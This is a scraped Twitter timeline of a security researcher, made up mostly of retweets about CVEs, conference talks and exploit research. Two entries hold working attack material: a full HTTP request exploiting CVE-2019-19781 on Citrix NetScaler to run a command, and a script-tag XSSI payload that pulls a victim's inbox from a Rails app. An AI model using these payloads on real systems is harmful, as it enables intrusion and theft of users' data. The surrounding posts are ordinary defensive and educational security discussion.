Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @lean0x2f
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @lean0x2f
-
BTW this is from
@maxientuiter, follow him for more amazing content :)Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:https://medium.com/@maxi./finding-and-exploiting-cve-2018-7445-f3103f163cc1 …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
Give a man an 0day and he'll have access for a day, teach a man to phish and he'll have access for life.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
I just published a ~45 page whitepaper on attacking and defending terraform infrastructure as code in GitHub. Includes attack scenarios, hardening, detections, etc. Deep thanks to
@tifkin_ and@harmj0y for their inspiration and research.
https://www.sans.org/reading-room/whitepapers/securecode/defending-infrastructure-code-github-enterprise-39380 …
1/3Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
Apply for a position as a Senior Security Consultant with Immunity at our HQ in Miami, Florida or Arlington, Virginia. https://www.immunityinc.com/careers/
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Just include that js view on your site and you will get all the user's e-mails: <div id="messages" class="messages"></div><script src="https://victim/messages/inbox?format=js"></script>
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
For example, this is a template file that renders an application/javascript response with all the messages in the user's inbox: $("
#messages").html('<%=j render("messages") %>');Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
When auditing Ruby on Rails apps, always search for <name>.js.erb views files. There is a stupid pattern called "Server-generated JavaScript Responses" which is a way to bypass SOP and inject content via JavaScript files (just like JSONP) which leads to XSSI.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
Unpopular opinion: VDPs should not have any rewards of any kind -- no rep/kudos, no swag. Any reward just incentivizes people to hunt on them, devaluing hackers' time, especially new hackers. They should be pure "see something, say something".
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
If you want to understand how this is possible, come tomorrow at
@BlackHatEvents#BHEU Location: Room D Date: Thursday, December 5 | 10:45am-11:35am https://www.blackhat.com/eu-19/briefings/schedule/index.html#unveiling-the-underground-world-of-anti-cheats-17358 …pic.twitter.com/yglag9yTfz
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
"I felt a great disturbance in the Force, as if millions of AWS SSRF vulnerabilities suddenly cried out in terror and were suddenly silenced. I fear something terrible has happened."https://aws.amazon.com/blogs/security/defense-in-depth-open-firewalls-reverse-proxies-ssrf-vulnerabilities-ec2-instance-metadata-service/ …
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
A Tale of Exploitation in Spreadsheet File Conversions - Researching exploitation in headless document conversion in LibreOffice w/
@erbbysam,@Smiegles,@Daeken https://buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/ …pic.twitter.com/lwPkzfwRy0
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
In
#BHEU Briefing@niemand_sec will explain the state of the anti-cheat software market designed to protect gaming software and details various bypass techniques http://ow.ly/fHxI50wDDcbHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
When confronted with a coding problem, one programmer thought, 'I know, I'll use threads' - and then two he hd aerpoblms
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
Charlas
#eko15
La receta de @6e726d y@LautaroFain tiene todo para el éxito: hardware, firmware y estaño recién soldado
.
#Eko15 talks!
This recipe has all it takes for success: hardware, firmware, and freshly welded pewter
INFO
https://bit.ly/2mawTid pic.twitter.com/a4sfPOQ5ex
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Leandro Barragan proslijedio/la je Tweet
https://www.zoomeye.org/searchResult?q=%27%3Cp%20hidden%3D%22hidden%22%27 … This honeypot system looks very popular right now, and ZoomEye's honeypot recognition service can cover this type. https://twitter.com/bad_packets/status/1154248626333339648 …pic.twitter.com/e5dtJxJutX
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
Nowadays you even need to be careful even with malicious monitors X) Nice Linux Kernel finding from
@taviso based on@semmle QL results from@nicowaisman and@pavgustinov Report: https://www.openwall.com/lists/oss-security/2019/07/19/2 … Query: https://lgtm.com/query/4659751768427255775/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Leandro Barragan proslijedio/la je Tweet
And I just merged
@_dirkjan's code to exploit CVE-2019-1040 (MIC Remove) using http://ntlmrelayx.py . Great stuff!https://github.com/SecureAuthCorp/impacket/pull/637 …Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.